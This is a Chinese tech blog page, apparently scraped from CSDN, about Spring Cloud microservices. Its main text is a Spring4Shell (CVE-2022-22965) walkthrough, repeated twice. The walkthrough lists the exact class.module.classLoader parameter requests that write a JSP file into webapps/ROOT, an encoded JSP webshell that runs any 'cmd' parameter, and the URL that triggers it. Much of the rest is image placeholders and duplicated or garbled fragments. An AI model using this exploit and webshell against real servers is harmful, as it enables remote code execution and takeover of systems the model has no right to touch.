码农知识堂 - 1000bd
  •   Python
  •   PHP
  •   JS/TS
  •   JAVA
  •   C/C++
  •   C#
  •   GO
  •   Kotlin
  •   Swift
  • 分布式微服务技术栈-SpringCloud<Eureka,Ribbon,nacos>


    在这里插入图片描述

    在这里插入图片描述

    微服务技术栈

    • springRCE
    • `
        • springcloud
    • springcloud
    • RCE
      • Spring4Shell(CVE-2022–22965)
    • 企业级实战——畅购商城SpringCloud-JAVA实战商城管理后台——分页实现
    • 企业级实战——畅购商城SpringCloud-JAVA实战商城管理后台——条件搜索实现
    • 企业级实战——畅购商城SpringCloud-JAVA实战商城管理后台——根据ID查询品牌实现,增加,删除,修改
    • 企业级实战——畅购商城SpringCloud-JAVA实战商城管理后台——查询所有品牌集合实现
    • 企业级实战——畅购商城SpringCloud-JAVA实战商城管理后台——商品微服务集成通用Mapper
    • 企业级实战——畅购商城SpringCloud-JAVA实战商城管理后台——数据库依赖包汇总工程搭建、商品微服务
      • 商品微服务
    • 企业级实战——畅购商城SpringCloud-JAVA实战商城管理后台——工具工程搭建和工具类导入
    • 企业级实战——畅购商城SpringCloud-JAVA实战商城管理后台——注册中心搭建
    • 企业级实战——畅购商城SpringCloud-JAVA实战商城管理后台——工程搭建-准备工作
          • 公共模块搭建-1
    • 企业级实战——畅购商城SpringCloud-JAVA实战商城管理后台——通用mapper
    • 企业级实战——畅购商城SpringCloud-JAVA实战商城管理后台——技术特点需求分析系统设计
    • Java微服务——商城项目工程搭建
        • 微服务工程结构搭建
    • 企业级实战 畅购商城SpringCloud-JAVA实战商城管理后台 开发电商行业分析电商模式
    • SpringCloud<Eureka,Ribbon,nacos>
    • 一、微服务 介绍了解
      • 1 架构结构案例
        • 与 springboot 兼容关系
        • 拆分案例
          • 拆分
          • 服务拆分-服务远程调用
      • 2 eureka注册中心
        • Eureka-提供者与消费者
        • Eureka-eureka原理分析
        • Eureka-搭建eureka服务
        • Eureka-服务注册
        • Eureka-服务发现
      • 3 Ribbon组件 负载均衡
        • Ribbon-负载均衡原理
        • Ribbon-负载均衡策略
        • Ribbon-饥饿加载
      • 4 nacos 阿里注册中心
        • Nacos-快速入门
        • Nacos-服务多级存储模型
        • Nacos-NacosRule负载均衡
        • Nacos-服务实例的权重设置
        • Nacos-环境隔离
        • Nacos和Eureka的对比
        • Nacos实现配置管理
        • Nacos配置管理-微服务配置拉取
        • Nacos配置管理-配置热更新
        • Nacos配置管理-多环境配置共享
        • Nacos配置管理-nacos集群搭建
    • 安装Nacos
    • Java快速开发框架_若依——Ruoyi-SpringCloud版本-3.下载源码并导入数据库 安装nacos
        • 准备工作
        • 运行系统
    • Nacos 漏洞复现
      • 介绍
      • 未授权添加用户
    • 分布式微服务技术栈SpringCloud<Feign>
    • Feign HTTP 客户端
      • Feign-基于Feign远程调用
      • Feign-自定义配置
    • 项目数据库选型——分布式数据库
          • 1.为什么选择分布式数据库?
          • 2.相关的技术概念介绍
          • 3.需要什么样的数据库
          • 1.Elasticsearch数据库
          • 2.Redis数据库
          • 3.Mongodb数据库
          • 4.Mysql分布式集群

    springRCE

    `

    SpEL是基于spring的一个表达式语言
    
    https://www.secpulse.com/archives/148624.html
    
    
    springshell
    
    
    
    
    
    • 1
    • 2
    • 3
    • 4
    • 5
    • 6
    • 7
    • 8
    • 9
    • 10
    spring
    artsploit
    
    spring jolokia RCE
    
    • 1
    • 2
    • 3
    • 4

    springcloud

    spring-core-rce  CVE-2022-22965
    2022年3月29日
    由于 SerializationUtils#deserialize 基于 Java 的序列化机制,可导致远程代码执行 (RCE),
    使用Spring框架的  JDK9及以上版本皆有可能受到影响
    可写入webshell以及命令执行
    
    通过框架的参数绑定功能获取AccessLogValve对象并诸如恶意字段值,从而触发pipeline机制并写入任意路径下的文件。
    
    
    利用条件
    1、Apache Tomcat作为Servlet容器;
    2、使用JDK9及以上版本的Spring MVC框架;
    3、Spring框架以及衍生的框架
    spring-beans-*.jar文件或者存在CachedIntrospectionResults.class
    
    
    http://xxx.xxx.230.165:27379/?class.module.classLoader.resources.context.parent.pipeline.first.pattern=spring
    http://xxx.xxx.230.165:27379/?class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp
    http://xxx.xxx.230.165:27379/?class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT
    http://xxx.xxx.230.165:27379/?class.module.classLoader.resources.context.parent.pipeline.first.prefix=shell
    http://xxx.xxx.230.165:27379/?class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=
    
    http://xxx.xxx.230.165:27379/?shell.jsp
    
    访问地址http://xxx.xxx.230.165:27379/?class.module.classLoader.resources.context.parent.pipeline.first.pattern=spring
    
    替换pattern后的内容为
    %25%7Bc2%7Di%20if(%22t%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di
    
    suffix:%>//
    c1:Runtime
    c2:<%
    
    
    
    • 1
    • 2
    • 3
    • 4
    • 5
    • 6
    • 7
    • 8
    • 9
    • 10
    • 11
    • 12
    • 13
    • 14
    • 15
    • 16
    • 17
    • 18
    • 19
    • 20
    • 21
    • 22
    • 23
    • 24
    • 25
    • 26
    • 27
    • 28
    • 29
    • 30
    • 31
    • 32
    • 33
    • 34

    在这里插入图片描述
    出现OK后,就可以访问http://xxx.xxx.230.165:27379/shell.jsp?pwd=t&cmd=whoami,即可执行任意代码

    在这里插入图片描述

    springcloud

    spring-core-rce  CVE-2022-22965
    2022年3月29日
    由于 SerializationUtils#deserialize 基于 Java 的序列化机制,可导致远程代码执行 (RCE),
    使用Spring框架的  JDK9及以上版本皆有可能受到影响
    可写入webshell以及命令执行
    
    通过框架的参数绑定功能获取AccessLogValve对象并诸如恶意字段值,从而触发pipeline机制并写入任意路径下的文件。
    
    
    利用条件
    1、Apache Tomcat作为Servlet容器;
    2、使用JDK9及以上版本的Spring MVC框架;
    3、Spring框架以及衍生的框架
    spring-beans-*.jar文件或者存在CachedIntrospectionResults.class
    
    
    http://xxx.xxx.230.165:27379/?class.module.classLoader.resources.context.parent.pipeline.first.pattern=spring
    http://xxx.xxx.230.165:27379/?class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp
    http://xxx.xxx.230.165:27379/?class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT
    http://xxx.xxx.230.165:27379/?class.module.classLoader.resources.context.parent.pipeline.first.prefix=shell
    http://xxx.xxx.230.165:27379/?class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=
    
    http://xxx.xxx.230.165:27379/?shell.jsp
    
    访问地址http://xxx.xxx.230.165:27379/?class.module.classLoader.resources.context.parent.pipeline.first.pattern=spring
    
    替换pattern后的内容为
    %25%7Bc2%7Di%20if(%22t%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di
    
    suffix:%>//
    c1:Runtime
    c2:<%
    
    
    
    • 1
    • 2
    • 3
    • 4
    • 5
    • 6
    • 7
    • 8
    • 9
    • 10
    • 11
    • 12
    • 13
    • 14
    • 15
    • 16
    • 17
    • 18
    • 19
    • 20
    • 21
    • 22
    • 23
    • 24
    • 25
    • 26
    • 27
    • 28
    • 29
    • 30
    • 31
    • 32
    • 33
    • 34

    在这里插入图片描述

    出现OK后,就可以访问http://xxx.xxx.230.165:27379/shell.jsp?pwd=t&cmd=whoami,即可执行任意代码
    在这里插入图片描述

    RCE

    Spring4Shell(CVE-2022–22965)

    CVE-2022-22965(Spring4Shell或SpringShell)是来自VMware的一种广泛使用的开源Java框架Spring Framework中的远程代码执行漏洞,

    以上面提到的Log4Shell漏洞命名。
    一旦攻击者实现了远程代码执行,就可以安装恶意软件,
    或者利用受影响的服务器作为初始立足点,以提升权限,进而攻击整个系统。

    用于部署加密货币挖矿软件,并且用在了使用臭名昭著的Mirai恶意软件的僵尸网络。

    企业级实战——畅购商城SpringCloud-JAVA实战商城管理后台——分页实现

    在这里插入图片描述
    在这里插入图片描述
    在这里插入图片描述
    在这里插入图片描述

    在这里插入图片描述
    swaggerAPI
    在这里插入图片描述
    在这里插入图片描述在这里插入图片描述
    在这里插入图片描述
    在这里插入图片描述
    在这里插入图片描述
    在这里插入图片描述在这里插入图片描述

    在这里插入图片描述
    在这里插入图片描述

    在这里插入图片描述
    在这里插入图片描述
    在这里插入图片描述
    在这里插入图片描述在这里插入图片描述在这里插入图片描述
    在这里插入图片描述
    在这里插入图片描述

    在这里插入图片描述
    在这里插入图片描述
    在这里插入图片描述
    在这里插入图片描述

    企业级实战——畅购商城SpringCloud-JAVA实战商城管理后台——条件搜索实现

    在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述

    在这里插入图片描述在这里插入图片描述

    在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述
    在这里插入图片描述
    在这里插入图片描述
    在这里插入图片描述

    在这里插入图片描述
    在这里插入图片描述
    在这里插入图片描述
    在这里插入图片描述
    在这里插入图片描述
    在这里插入图片描述
    在这里插入图片描述
    在这里插入图片描述
    在这里插入图片描述在这里插入图片描述

    在这里插入图片描述
    在这里插入图片描述
    在这里插入图片描述
    在这里插入图片描述

    企业级实战——畅购商城SpringCloud-JAVA实战商城管理后台——根据ID查询品牌实现,增加,删除,修改

    在这里插入图片描述
    在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述
    在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述

    在这里插入图片描述

    在这里插入图片描述在这里插入图片描述
    在这里插入图片描述
    在这里插入图片描述在这里插入图片描述
    在这里插入图片描述
    在这里插入图片描述

    在这里插入图片描述
    在这里插入图片描述
    在这里插入图片描述在这里插入图片描述
    在这里插入图片描述
    在这里插入图片描述
    在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述
    在这里插入图片描述
    在这里插入图片描述
    在这里插入图片描述

    企业级实战——畅购商城SpringCloud-JAVA实战商城管理后台——查询所有品牌集合实现

    在这里插入图片描述在这里插入图片描述 在这里插入图片描述在这里插入图片描述

  • 相关阅读:
    Docker-CentOS开启防火墙firewalled映射Docker端口
    晶体三极管型号及结构
    Infer的安装及基本使用
    四、文件管理(二)目录
    【附源码】计算机毕业设计SSM网上水果商城
    SQL的语法
    pinia的基本使用和核心实现原理
    Jetpack生命周期感知组件ViewModel
    Linux内核之堆溢出的利用
    HTML CSS JS 网页设计作业「我的家乡吉林」
  • 原文地址:https://blog.csdn.net/qq_33608000/article/details/133918875
  • 最新文章
  • 攻防演习之三天拿下官网站群
    数据安全治理学习——前期安全规划和安全管理体系建设
    企业安全 | 企业内一次钓鱼演练准备过程
    内网渗透测试 | Kerberos协议及其部分攻击手法
    0day的产生 | 不懂代码的"代码审计"
    安装scrcpy-client模块av模块异常,环境问题解决方案
    leetcode hot100【LeetCode 279. 完全平方数】java实现
    OpenWrt下安装Mosquitto
    AnatoMask论文汇总
    【AI日记】24.11.01 LangChain、openai api和github copilot
  • 热门文章
  • 十款代码表白小特效 一个比一个浪漫 赶紧收藏起来吧!!!
    奉劝各位学弟学妹们,该打造你的技术影响力了!
    五年了,我在 CSDN 的两个一百万。
    Java俄罗斯方块,老程序员花了一个周末,连接中学年代!
    面试官都震惊,你这网络基础可以啊!
    你真的会用百度吗?我不信 — 那些不为人知的搜索引擎语法
    心情不好的时候,用 Python 画棵樱花树送给自己吧
    通宵一晚做出来的一款类似CS的第一人称射击游戏Demo!原来做游戏也不是很难,连憨憨学妹都学会了!
    13 万字 C 语言从入门到精通保姆级教程2021 年版
    10行代码集2000张美女图,Python爬虫120例,再上征途
Copyright © 2022 侵权请联系2656653265@qq.com    京ICP备2022015340号-1
正则表达式工具 cron表达式工具 密码生成工具

京公网安备 11010502049817号